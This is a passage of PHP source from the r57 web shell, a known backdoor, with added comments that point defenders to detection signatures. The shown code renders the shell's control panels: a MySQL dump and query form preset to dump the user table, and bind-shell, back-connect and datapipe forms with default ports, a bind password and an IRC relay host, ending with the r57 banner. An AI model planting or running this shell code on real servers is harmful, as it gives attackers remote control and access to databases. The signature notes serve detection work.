2267 echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
2268 echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
2269 echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
2270 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
2271 echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
2272 echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
2273 echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
2274 echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
2275 echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
// The posted `db_query` value is concatenated into the textarea without HTML escaping.
2276 echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
2277 }
// Panel "id21": rendered when $safe_mode and $windows are both falsy. Three forms in a row,
// none of which carries a hidden cmd field (only dir=$dir), so the handler presumably
// distinguishes them by field names or the submit label — not visible in this chunk.
//   form 1: port ("11457"), bind_pass ("r57"), select `use` (Perl / C)
//   form 2: ip (REMOTE_ADDR from the environment, else "127.0.0.1"), port ("11457"),
//           select `use` (Perl / C)
//   form 3: local_port ("11457"), remote_host ("irc.dalnet.ru"), remote_port ("6667"),
//           select `use` (labelled datapipe.pl / datapipe.c)
// For defenders: the hard-coded defaults (11457, r57, irc.dalnet.ru, 6667) are stable strings
// for file-content signatures, and the port values are useful when hunting for unexpected
// listeners or outbound connections from a web-server account.
2278 if(!$safe_mode&&!$windows){
2279 echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
2280 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
2281 echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
2282 echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
2283 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2284 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
2285 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2286 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
2287 echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
2288 echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
2289 echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
2290 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
2291 echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
2292 echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
2293 echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
2294 echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
2295 echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
2296 echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
2297 echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
2298 echo $te."</td>".$fe."</tr></div></table>";
2299 }
// Page footer: closes the outer tables and prints a banner containing the literal
// "r57.gen.tr v1.3- Thesaboarqe", a link to www.r57.gen.tr and the value of $version
// ($version, $table_up3 and $f are defined outside this chunk).
// For defenders: the banner is emitted verbatim in every rendered page, so it serves as a
// response-body and file-content signature for this variant.
2300 echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57.gen.tr v1.3- Thesaboarqe : R57<a href=http://www.r57.gen.tr/>www.r57.gen.tr/</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
2301 ?>